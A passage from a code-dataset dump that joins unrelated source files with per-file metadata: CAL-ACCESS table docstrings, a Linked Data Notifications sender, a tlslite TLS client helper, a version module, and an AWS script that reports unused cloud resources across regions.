Also, the only value observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER1_CD and LOBBYIST_EMPLOYER3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the only value observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
Deprecated table for the disclosure of lobbyist relationships.
This table is 99 percent identical to LOBBYIST_EMPLOYER1_CD and LOBBYIST_EMPLOYER2_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the only value observed in SESSION_YR_1 is 1999 and the only value
observed in SESSION_YR_2 is 2000.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMPLOYER_FIRMS2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_EMPLOYER_FIRMS1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also the distinct SESSION_ID values span from 1995 to 2001, so probably this
table is no longer in use.
Undocumented.
An empty file of the same name is included in the Secretary of State's daily CAL-ACCESS database exports.
This table is documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation
on these tables. Cox 5/11/2000".
Also, the columns on this table are identical to the columns on the
LOBBYIST_EMPLOYER1_CD, LOBBYIST_EMPLOYER2_CD and LOBBYIST_EMPLOYER3_CD
tables.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM2_CD and LOBBYIST_FIRM3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM1_CD and LOBBYIST_FIRM3_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM1_CD and LOBBYIST_FIRM2_CD.
All three tables are documented in "Cal-Access Tables, Columns, Indexes", but
with this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, the distinct SESSION_YR_1 values are 2001, and the distinct SESSION_YR_2
are 2002.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_EMPLOYER2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also RPT_START and RPT_END each contain only one distinct value, "2001-04-01"
and "2001-06-30", respectively.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_EMPLOYER1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also RPT_START and RPT_END each contain only one distinct value, "2001-04-01"
and "2001-06-30", respectively.
Undocumented.
An empty file of the same name is included in the Secretary of State's daily CAL-ACCESS database exports.
This table is documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation
on these tables. Cox 5/11/2000".
Also, the columns on this table are identical to the columns on the
LOBBYIST_FIRM1_CD, LOBBYIST_FIRM2_CD and LOBBYIST_FIRM3_CD tables.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_LOBBYIST2_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, all rows have the same SESSION_ID value: 2001.
Deprecated table for the disclosure of lobbyist relationships.
This table is identical to LOBBYIST_FIRM_LOBBYIST1_CD.
Both tables are documented in "Cal-Access Tables, Columns, Indexes", but with
this cryptic note: "Matt needs to describe the relationship between the
multiple tables. Documentation should be cloned from D H's documentation on
these tables. Cox 5/11/2000".
Also, all rows have the same SESSION_ID value: 2001.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Meta model options.
Models for storing inactive and deprecated tables from the CAL-ACCESS database.
!/usr/bin/env python -*- coding: utf-8 -*- Models Annotations | 10,299 | en | 0.822327 |
from rdflib import Graph
import requests
import ipaddress
import json
import socket
from urllib.parse import urlparse
from .base import BaseLDN
class Sender(BaseLDN):
def __init__(self, **kwargs):
super(self.__class__, self).__init__(**kwargs)
self.allow_localhost = kwargs.get('allow_localhost', False)
    def __accept_post_options(self, inbox, **kwargs):
        """Ask the inbox (via an OPTIONS request) which content types it accepts for POST."""
r = requests.options(inbox, **kwargs)
if r.status_code == requests.codes.ok and 'accept-post' in r.headers:
if self.JSON_LD in r.headers['accept-post']:
return self.JSON_LD
for content_type in r.headers['accept-post'].split(','):
return self.content_type_to_mime_type(content_type)
    def __is_localhost(self, inbox):
        """Return True if the inbox hostname resolves to a loopback address."""
return ipaddress.ip_address(socket.gethostbyname(
urlparse(inbox).hostname)).is_loopback
    def __post_message(self, inbox, data, content_type, **kwargs):
        """POST the serialized payload to the inbox, refusing loopback targets unless allowed."""
if self.allow_localhost or not self.__is_localhost(inbox):
headers = kwargs.pop("headers", dict())
headers['content-type'] = content_type
r = requests.post(inbox, data=data, headers=headers, **kwargs)
r.raise_for_status()
else:
raise ValueError("Invalid local inbox.")
def send(self, inbox, data, **kwargs):
"""Send the provided data to an inbox."""
if isinstance(data, dict) or isinstance(data, list):
self.__post_message(inbox, json.dumps(data), self.JSON_LD,
**kwargs)
elif isinstance(data, str):
self.__post_message(inbox, data, self.JSON_LD, **kwargs)
elif isinstance(data, Graph):
ct = self.__accept_post_options(inbox, **kwargs) or self.JSON_LD
self.__post_message(inbox, data.serialize(format=ct), ct,
**kwargs)
else:
raise TypeError(
"You cannot send data of type {}.".format(type(data)))
| ldnlib/sender.py | 2,017 | Send the provided data to an inbox. | 35 | en | 0.68172 |
"""
A helper class for using TLS Lite with stdlib clients
(httplib, xmlrpclib, imaplib, poplib).
"""
from tlslite.Checker import Checker
class ClientHelper:
"""This is a helper class used to integrate TLS Lite with various
TLS clients (e.g. poplib, smtplib, httplib, etc.)"""
def __init__(self,
username=None, password=None, sharedKey=None,
certChain=None, privateKey=None,
cryptoID=None, protocol=None,
x509Fingerprint=None,
x509TrustList=None, x509CommonName=None,
settings = None):
"""
For client authentication, use one of these argument
combinations:
- username, password (SRP)
- username, sharedKey (shared-key)
- certChain, privateKey (certificate)
For server authentication, you can either rely on the
implicit mutual authentication performed by SRP or
shared-keys, or you can do certificate-based server
authentication with one of these argument combinations:
- cryptoID[, protocol] (requires cryptoIDlib)
- x509Fingerprint
- x509TrustList[, x509CommonName] (requires cryptlib_py)
Certificate-based server authentication is compatible with
SRP or certificate-based client authentication. It is
not compatible with shared-keys.
The constructor does not perform the TLS handshake itself, but
simply stores these arguments for later. The handshake is
performed only when this class needs to connect with the
server. Then you should be prepared to handle TLS-specific
exceptions. See the client handshake functions in
L{tlslite.TLSConnection.TLSConnection} for details on which
exceptions might be raised.
@type username: str
@param username: SRP or shared-key username. Requires the
'password' or 'sharedKey' argument.
@type password: str
@param password: SRP password for mutual authentication.
Requires the 'username' argument.
@type sharedKey: str
@param sharedKey: Shared key for mutual authentication.
Requires the 'username' argument.
@type certChain: L{tlslite.X509CertChain.X509CertChain} or
L{cryptoIDlib.CertChain.CertChain}
@param certChain: Certificate chain for client authentication.
Requires the 'privateKey' argument. Excludes the SRP or
shared-key related arguments.
@type privateKey: L{tlslite.utils.RSAKey.RSAKey}
@param privateKey: Private key for client authentication.
Requires the 'certChain' argument. Excludes the SRP or
shared-key related arguments.
@type cryptoID: str
@param cryptoID: cryptoID for server authentication. Mutually
exclusive with the 'x509...' arguments.
@type protocol: str
@param protocol: cryptoID protocol URI for server
authentication. Requires the 'cryptoID' argument.
@type x509Fingerprint: str
@param x509Fingerprint: Hex-encoded X.509 fingerprint for
server authentication. Mutually exclusive with the 'cryptoID'
and 'x509TrustList' arguments.
@type x509TrustList: list of L{tlslite.X509.X509}
@param x509TrustList: A list of trusted root certificates. The
other party must present a certificate chain which extends to
one of these root certificates. The cryptlib_py module must be
installed to use this parameter. Mutually exclusive with the
'cryptoID' and 'x509Fingerprint' arguments.
@type x509CommonName: str
@param x509CommonName: The end-entity certificate's 'CN' field
must match this value. For a web server, this is typically a
server name such as 'www.amazon.com'. Mutually exclusive with
the 'cryptoID' and 'x509Fingerprint' arguments. Requires the
'x509TrustList' argument.
@type settings: L{tlslite.HandshakeSettings.HandshakeSettings}
@param settings: Various settings which can be used to control
the ciphersuites, certificate types, and SSL/TLS versions
offered by the client.
"""
self.username = None
self.password = None
self.sharedKey = None
self.certChain = None
self.privateKey = None
self.checker = None
#SRP Authentication
if username and password and not \
(sharedKey or certChain or privateKey):
self.username = username
self.password = password
#Shared Key Authentication
elif username and sharedKey and not \
(password or certChain or privateKey):
self.username = username
self.sharedKey = sharedKey
#Certificate Chain Authentication
elif certChain and privateKey and not \
(username or password or sharedKey):
self.certChain = certChain
self.privateKey = privateKey
#No Authentication
elif not password and not username and not \
sharedKey and not certChain and not privateKey:
pass
else:
raise ValueError("Bad parameters")
#Authenticate the server based on its cryptoID or fingerprint
if sharedKey and (cryptoID or protocol or x509Fingerprint):
raise ValueError("Can't use shared keys with other forms of"\
"authentication")
self.checker = Checker(cryptoID, protocol, x509Fingerprint,
x509TrustList, x509CommonName)
self.settings = settings
self.tlsSession = None
def _handshake(self, tlsConnection):
if self.username and self.password:
tlsConnection.handshakeClientSRP(username=self.username,
password=self.password,
checker=self.checker,
settings=self.settings,
session=self.tlsSession)
elif self.username and self.sharedKey:
tlsConnection.handshakeClientSharedKey(username=self.username,
sharedKey=self.sharedKey,
settings=self.settings)
else:
tlsConnection.handshakeClientCert(certChain=self.certChain,
privateKey=self.privateKey,
checker=self.checker,
settings=self.settings,
session=self.tlsSession)
self.tlsSession = tlsConnection.session | third_party/tlslite/tlslite/integration/ClientHelper.py | 6,851 | This is a helper class used to integrate TLS Lite with various
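# --- Illustrative usage sketch (not part of the original module) ---
# A minimal, hedged example of the argument combinations described in the
# constructor docstring. All credential values and the fingerprint below are
# hypothetical. Nothing connects to a server here; the TLS handshake only
# happens later, when _handshake() is given a TLSConnection by a subclass.
if __name__ == '__main__':
    # SRP client authentication, plus fingerprint-based server authentication.
    srp_helper = ClientHelper(username="alice", password="s3cret",
                              x509Fingerprint="0123456789abcdef0123456789abcdef01234567")
    # Shared-key authentication; it authenticates both sides by itself, so it
    # may not be combined with the certificate-based server checks above.
    shared_helper = ClientHelper(username="alice", sharedKey="shared-secret")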
TLS clients (e.g. poplib, smtplib, httplib, etc.)
For client authentication, use one of these argument
combinations:
- username, password (SRP)
- username, sharedKey (shared-key)
- certChain, privateKey (certificate)
For server authentication, you can either rely on the
implicit mutual authentication performed by SRP or
shared-keys, or you can do certificate-based server
authentication with one of these argument combinations:
- cryptoID[, protocol] (requires cryptoIDlib)
- x509Fingerprint
- x509TrustList[, x509CommonName] (requires cryptlib_py)
Certificate-based server authentication is compatible with
SRP or certificate-based client authentication. It is
not compatible with shared-keys.
The constructor does not perform the TLS handshake itself, but
simply stores these arguments for later. The handshake is
performed only when this class needs to connect with the
server. Then you should be prepared to handle TLS-specific
exceptions. See the client handshake functions in
L{tlslite.TLSConnection.TLSConnection} for details on which
exceptions might be raised.
@type username: str
@param username: SRP or shared-key username. Requires the
'password' or 'sharedKey' argument.
@type password: str
@param password: SRP password for mutual authentication.
Requires the 'username' argument.
@type sharedKey: str
@param sharedKey: Shared key for mutual authentication.
Requires the 'username' argument.
@type certChain: L{tlslite.X509CertChain.X509CertChain} or
L{cryptoIDlib.CertChain.CertChain}
@param certChain: Certificate chain for client authentication.
Requires the 'privateKey' argument. Excludes the SRP or
shared-key related arguments.
@type privateKey: L{tlslite.utils.RSAKey.RSAKey}
@param privateKey: Private key for client authentication.
Requires the 'certChain' argument. Excludes the SRP or
shared-key related arguments.
@type cryptoID: str
@param cryptoID: cryptoID for server authentication. Mutually
exclusive with the 'x509...' arguments.
@type protocol: str
@param protocol: cryptoID protocol URI for server
authentication. Requires the 'cryptoID' argument.
@type x509Fingerprint: str
@param x509Fingerprint: Hex-encoded X.509 fingerprint for
server authentication. Mutually exclusive with the 'cryptoID'
and 'x509TrustList' arguments.
@type x509TrustList: list of L{tlslite.X509.X509}
@param x509TrustList: A list of trusted root certificates. The
other party must present a certificate chain which extends to
one of these root certificates. The cryptlib_py module must be
installed to use this parameter. Mutually exclusive with the
'cryptoID' and 'x509Fingerprint' arguments.
@type x509CommonName: str
@param x509CommonName: The end-entity certificate's 'CN' field
must match this value. For a web server, this is typically a
server name such as 'www.amazon.com'. Mutually exclusive with
the 'cryptoID' and 'x509Fingerprint' arguments. Requires the
'x509TrustList' argument.
@type settings: L{tlslite.HandshakeSettings.HandshakeSettings}
@param settings: Various settings which can be used to control
the ciphersuites, certificate types, and SSL/TLS versions
offered by the client.
A helper class for using TLS Lite with stdlib clients
(httplib, xmlrpclib, imaplib, poplib).
SRP AuthenticationShared Key AuthenticationCertificate Chain AuthenticationNo AuthenticationAuthenticate the server based on its cryptoID or fingerprint | 3,457 | en | 0.719124 |
""":mod:`kinsumer.version` --- Version information
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
VERSION_INFO = (0, 5, 3)
VERSION = '{}.{}.{}'.format(*VERSION_INFO)
if __name__ == '__main__':
print(VERSION)
| kinsumer/version.py | 222 | :mod:`kinsumer.version` --- Version information
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | 98 | pl | 0.228766 |
"""
SYNOPSIS
--------
Get the details of unused resources present across regions in the AWS account
DESCRIPTION
-----------
This script provides a detailed overview of the number of unused resources present in the AWS account.
It provides service-wise details of unused resources lying around in all the regions of the AWS account.
PREREQUISITES
-------------
- Workstation with Python version 3 and above
- AWS python-based SDK: boto3
Installation command: pip3 install boto3
- pandas framework and openpyxl for reporting operations (xlsx file).
Installation command(s):
- pip3 install pandas
- pip3 install openpyxl
- User credentials (Access Key Id and Secret Access Key) of a user having at least the Security Audit permission on the AWS account
EXAMPLE
-------
This script can be executed with any Python 3 interpreter (AWS CloudShell, PowerShell, bash, or any command line tool with Python installed)
Command: python ./unused_aws_resources.py --accessKey <AWS Access Key Id> --secretKey <AWS Secret Access Key>
OUTPUT
------
- The script will provide a summarized count of all unused resources in the account.
- For a detailed view, the user can refer to the .xlsx file that will be generated by the script.
"""
import json
import boto3
import argparse
import multiprocessing
import csv
import os
import pandas as pd
import sys
import glob
from urllib.request import urlopen
def ebs_volume(function, credentials, unused_resource_count, region_list):
print('Scanning EBS Volumes')
volume_count = 0
unused_volume_detail = []
for region in region_list:
try:
ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
volumes = list(ec2.volumes.all())
unused_volumes = set([volume.volume_id for volume in volumes if volume.state == 'available'])
for volume_id in unused_volumes:
unused_volume_detail.append({'ResourceType':'AWS::EC2::Volume','ResourceId':volume_id,'Region':region})
volume_count+=len(unused_volumes)
except:
pass
if volume_count:
unused_volume_detail = json.loads(json.dumps(unused_volume_detail))
f = csv.writer(open("./aws_logs/ebs_volume.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_volume_detail in unused_volume_detail:
f.writerow([unused_volume_detail["ResourceType"],
unused_volume_detail["ResourceId"],
unused_volume_detail["Region"]])
unused_resource_count[function] = volume_count
def elastic_ip(function, credentials, unused_resource_count, region_list):
print('Scanning Elastic IPs')
eip_count = 0
unused_eip_detail = []
for region in region_list:
try:
ec2_client = boto3.client('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
eip_data = ec2_client.describe_addresses()['Addresses']
for eip in eip_data:
try:
AssociationId = eip['AssociationId']
except:
AssociationId = ''
if not AssociationId:
unused_eip_detail.append({'ResourceType':'AWS::EC2::EIP','ResourceId':eip['AllocationId'],'Region':region})
eip_count += 1
except:
pass
if eip_count:
unused_eip_detail = json.loads(json.dumps(unused_eip_detail))
f = csv.writer(open("./aws_logs/elastic_ip.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_eip_detail in unused_eip_detail:
f.writerow([unused_eip_detail["ResourceType"],
unused_eip_detail["ResourceId"],
unused_eip_detail["Region"]])
unused_resource_count[function] = eip_count
def network_interface(function, credentials, unused_resource_count, region_list):
print('Scanning Network Interfaces')
ni_count = 0
unused_ni_detail = []
for region in region_list:
try:
ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
network_interfaces = list(ec2.network_interfaces.all())
unused_nis = set([ni.network_interface_id for ni in network_interfaces if ni.status == 'available'])
for network_interface_id in unused_nis:
unused_ni_detail.append({'ResourceType':'AWS::EC2::NetworkInterface','ResourceId':network_interface_id,'Region':region})
ni_count+=len(unused_nis)
except:
pass
if ni_count:
unused_ni_detail = json.loads(json.dumps(unused_ni_detail))
f = csv.writer(open("./aws_logs/network_interface.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_ni_detail in unused_ni_detail:
f.writerow([unused_ni_detail["ResourceType"],
unused_ni_detail["ResourceId"],
unused_ni_detail["Region"]])
unused_resource_count[function] = ni_count
def vpc(function, credentials, unused_resource_count, region_list):
print('Scanning VPCs')
vpc_count = 0
unused_vpc_detail = []
for region in region_list:
try:
ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
vpcs = list(ec2.vpcs.all())
network_interfaces = list(ec2.network_interfaces.all())
all_vpcs = set([vpc.vpc_id for vpc in vpcs])
            all_active_vpcs = set([ni.vpc_id for ni in network_interfaces])  # VPC IDs that still back a network interface
unused_vpcs = all_vpcs - all_active_vpcs
for vpcid in unused_vpcs:
unused_vpc_detail.append({'ResourceType':'AWS::EC2::VPC','ResourceId':vpcid,'Region':region})
vpc_count+=len(unused_vpcs)
except:
pass
if vpc_count:
unused_vpc_detail = json.loads(json.dumps(unused_vpc_detail))
f = csv.writer(open("./aws_logs/vpc.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_vpc_detail in unused_vpc_detail:
f.writerow([unused_vpc_detail["ResourceType"],
unused_vpc_detail["ResourceId"],
unused_vpc_detail["Region"]])
unused_resource_count[function] = vpc_count
def subnet(function, credentials, unused_resource_count, region_list):
print('Scanning Subnets')
subnet_count = 0
unused_subnet_detail = []
for region in region_list:
try:
ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
subnets = list(ec2.subnets.all())
network_interfaces = list(ec2.network_interfaces.all())
all_subnets = set([subnet.subnet_id for subnet in subnets])
            all_active_subnets = set([ni.subnet_id for ni in network_interfaces])  # subnet IDs that still back a network interface
unused_subnets = all_subnets - all_active_subnets
for subnetid in unused_subnets:
unused_subnet_detail.append({'ResourceType':'AWS::EC2::Subnet','ResourceId':subnetid,'Region':region})
subnet_count+=len(unused_subnets)
except:
pass
if subnet_count:
unused_subnet_detail = json.loads(json.dumps(unused_subnet_detail))
f = csv.writer(open("./aws_logs/subnet.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_subnet_detail in unused_subnet_detail:
f.writerow([unused_subnet_detail["ResourceType"],
unused_subnet_detail["ResourceId"],
unused_subnet_detail["Region"]])
unused_resource_count[function] = subnet_count
def security_group(function, credentials, unused_resource_count, region_list):
print('Scanning Security Groups')
sg_count = 0
unused_sg_detail = []
for region in region_list:
try:
ec2 = boto3.resource('ec2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
sgs = list(ec2.security_groups.all())
network_interfaces = list(ec2.network_interfaces.all())
all_sgs = set([sg.group_id for sg in sgs])
all_inst_sgs = set([sg['GroupId'] for ni in network_interfaces for sg in ni.groups])
unused_sgs = all_sgs - all_inst_sgs
for sgid in unused_sgs:
unused_sg_detail.append({'ResourceType':'AWS::EC2::SecurityGroup','ResourceId':sgid,'Region':region})
sg_count+=len(unused_sgs)
except:
pass
if sg_count:
unused_sg_detail = json.loads(json.dumps(unused_sg_detail))
f = csv.writer(open("./aws_logs/security_group.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_sg_detail in unused_sg_detail:
f.writerow([unused_sg_detail["ResourceType"],
unused_sg_detail["ResourceId"],
unused_sg_detail["Region"]])
unused_resource_count[function] = sg_count
def classic_loadbalancer(function, credentials, unused_resource_count, region_list):
print('Scanning Classic Load balancers')
elb_count = 0
unused_elb_detail = []
for region in region_list:
try:
classic_lb = boto3.client('elb', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
paginated_data=[]
elb_paginator = classic_lb.get_paginator('describe_load_balancers')
for load_balancers in elb_paginator.paginate():
paginated_data.extend(load_balancers['LoadBalancerDescriptions'])
for elb_detail in paginated_data:
instance_health_status = []
instance_data = classic_lb.describe_instance_health(LoadBalancerName=elb_detail['LoadBalancerName'])['InstanceStates']
for instance in instance_data:
instance_health_status.append(instance['State'])
if 'InService' not in instance_health_status:
unused_elb_detail.append({'ResourceType':'AWS::ElasticLoadBalancing::LoadBalancer','ResourceId':elb_detail['LoadBalancerName'],'Region':region})
elb_count+=1
except:
pass
if elb_count:
unused_elb_detail = json.loads(json.dumps(unused_elb_detail))
f = csv.writer(open("./aws_logs/classic_loadbalancer.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_elb_detail in unused_elb_detail:
f.writerow([unused_elb_detail["ResourceType"],
unused_elb_detail["ResourceId"],
unused_elb_detail["Region"]])
unused_resource_count[function] = elb_count
def app_nw_gateway_loadbalancer(function, credentials, unused_resource_count, region_list):
print('Scanning Application/Network/Gateway Load balancers')
elbv2_count = 0
unused_elbv2_detail = []
for region in region_list:
try:
elbv2 = boto3.client('elbv2', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'], region_name=region)
paginated_data=[]
elbv2_paginator = elbv2.get_paginator('describe_load_balancers')
for load_balancers in elbv2_paginator.paginate():
paginated_data.extend(load_balancers['LoadBalancers'])
for elbv2_detail in paginated_data:
target_health_status = []
try:
target_group_detail = elbv2.describe_target_groups(LoadBalancerArn=elbv2_detail['LoadBalancerArn'])['TargetGroups']
for target_group in target_group_detail:
target_group_health = elbv2.describe_target_health(TargetGroupArn=target_group['TargetGroupArn'])['TargetHealthDescriptions']
for target in target_group_health:
target_health_status.append(target['TargetHealth']['State'])
except:
pass
if 'healthy' not in target_health_status:
unused_elbv2_detail.append({'ResourceType':'AWS::ElasticLoadBalancingV2::LoadBalancer', 'LoadBalancer_Type':elbv2_detail['Type'], 'ResourceId':elbv2_detail['LoadBalancerName'],'Region':region})
elbv2_count+=1
except:
pass
if elbv2_count:
unused_elbv2_detail = json.loads(json.dumps(unused_elbv2_detail))
f = csv.writer(open("./aws_logs/app_nw_gateway_loadbalancer.csv", "w", newline=''))
f.writerow(["ResourceType", "LoadBalancer_Type", "ResourceId", "Region"])
for unused_elbv2_detail in unused_elbv2_detail:
f.writerow([unused_elbv2_detail["ResourceType"],
unused_elbv2_detail["LoadBalancer_Type"],
unused_elbv2_detail["ResourceId"],
unused_elbv2_detail["Region"]])
unused_resource_count[function] = elbv2_count
def iam_user(function, credentials, unused_resource_count, region_list):
print('Scanning IAM Users')
iamuser_count = 0
unused_iamuser_detail = []
try:
iam = boto3.resource('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'])
iam_client = boto3.client('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'])
iamuser_data = list(iam.users.all())
for user in iamuser_data:
if not user.password_last_used and not iam_client.list_access_keys(UserName=user.name)['AccessKeyMetadata']:
unused_iamuser_detail.append({'ResourceType':'AWS::IAM::User', 'ResourceId': user.name, 'Region':'Global'})
iamuser_count += 1
except:
pass
if iamuser_count:
unused_iamuser_detail = json.loads(json.dumps(unused_iamuser_detail))
f = csv.writer(open("./aws_logs/iam_user.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_iamuser_detail in unused_iamuser_detail:
f.writerow([unused_iamuser_detail["ResourceType"],
unused_iamuser_detail["ResourceId"],
unused_iamuser_detail["Region"]])
unused_resource_count[function] = iamuser_count
def iam_group(function, credentials, unused_resource_count, region_list):
print('Scanning IAM Groups')
iamgroup_count = 0
unused_iamgroup_detail = []
try:
iam = boto3.resource('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'])
iam_client = boto3.client('iam', aws_access_key_id=credentials['access_key'], aws_secret_access_key=credentials['secret_key'])
iamgroup_data = list(iam.groups.all())
for group in iamgroup_data:
if not iam_client.get_group(GroupName=group.name)['Users']:
unused_iamgroup_detail.append({'ResourceType':'AWS::IAM::Group', 'ResourceId': group.name, 'Region':'Global'})
iamgroup_count += 1
except:
pass
if iamgroup_count:
unused_iamgroup_detail = json.loads(json.dumps(unused_iamgroup_detail))
f = csv.writer(open("./aws_logs/iam_group.csv", "w", newline=''))
f.writerow(["ResourceType", "ResourceId", "Region"])
for unused_iamgroup_detail in unused_iamgroup_detail:
f.writerow([unused_iamgroup_detail["ResourceType"],
unused_iamgroup_detail["ResourceId"],
unused_iamgroup_detail["Region"]])
unused_resource_count[function] = iamgroup_count
def main(arg):
access_key = arg.accessKey
secret_key = arg.secretKey
region_list = []
unused_resource_details = {}
try:
print("Connecting to AWS account ")
session = boto3.session.Session(aws_access_key_id=access_key, aws_secret_access_key=secret_key)
except:
print("\033[1;31;40m ""Please do Check for Credentials provided or Internet Connection and Try Again\n")
quit()
iam = session.client('sts')
account_id = iam.get_caller_identity()["Account"]
print("Successfully connected to AWS account", account_id)
print("Scanning for unused resources across all available regions.")
print("Wait for few minutes...\n")
function_list= [ ebs_volume, elastic_ip, network_interface, vpc, subnet, security_group, classic_loadbalancer, app_nw_gateway_loadbalancer,
iam_user, iam_group ]
print("Collecting list of enabled region")
available_regions = session.client('ec2',region_name="us-east-1")
enabled_regions = available_regions.describe_regions()['Regions']
for region in enabled_regions:
region_list.append(region['RegionName'])
manager = multiprocessing.Manager()
unused_resource_count = manager.dict()
credentials = manager.dict()
credentials['access_key'] = access_key
credentials['secret_key'] = secret_key
credentials['account_id'] = account_id
jobs = []
try:
os.mkdir("./aws_logs")
except:
pass
for function in function_list:
try:
p = multiprocessing.Process(target=function, args=(function, credentials, unused_resource_count, region_list))
jobs.append(p)
p.start()
except:
print("Exception occurred while creating processes. Please try again later!")
quit()
if jobs:
for process in jobs:
try:
process.join()
except:
print("Exception occurred while joining processes. Please try again later!")
quit()
os.chdir('./aws_logs')
writer = pd.ExcelWriter('unused_resources.xlsx')
all_files = glob.glob("*.csv")
for f in all_files:
df = pd.read_csv(f)
df.to_excel(writer,sheet_name=f.split('.')[0], index=False)
writer.save()
for f in all_files:
os.remove(f)
print("Completed account scan")
# Updating Resource Count Object
unused_resource_details.update({ 'AWS::EC2::Volume': unused_resource_count[ebs_volume],
'AWS::EC2::EIP': unused_resource_count[elastic_ip],
'AWS::EC2::NetworkInterface': unused_resource_count[network_interface],
'AWS::EC2::VPC': unused_resource_count[vpc],
'AWS::EC2::Subnet': unused_resource_count[subnet],
'AWS::EC2::SecurityGroup': unused_resource_count[security_group],
'AWS::ElasticLoadBalancing::LoadBalancer': unused_resource_count[classic_loadbalancer],
'AWS::ElasticLoadBalancingV2::LoadBalancer': unused_resource_count[app_nw_gateway_loadbalancer],
'AWS::IAM::User': unused_resource_count[iam_user],
'AWS::IAM::Group': unused_resource_count[iam_group]
})
# Showing Resource Distribution
print("\nUnused Resources in the Account:")
unused_resource_count = 0
for key, value in sorted(unused_resource_details.items(), key=lambda x: x[1], reverse=True):
if value != 0:
print("\t{} : {}".format(key, value))
unused_resource_count+=value
print("\n\nSummary:")
print("\tTotal Unused Resources:", unused_resource_count)
print("\n\nDetailed unused resource information can be found at: aws_logs/unused_resources.xlsx")
if(__name__ == '__main__'):
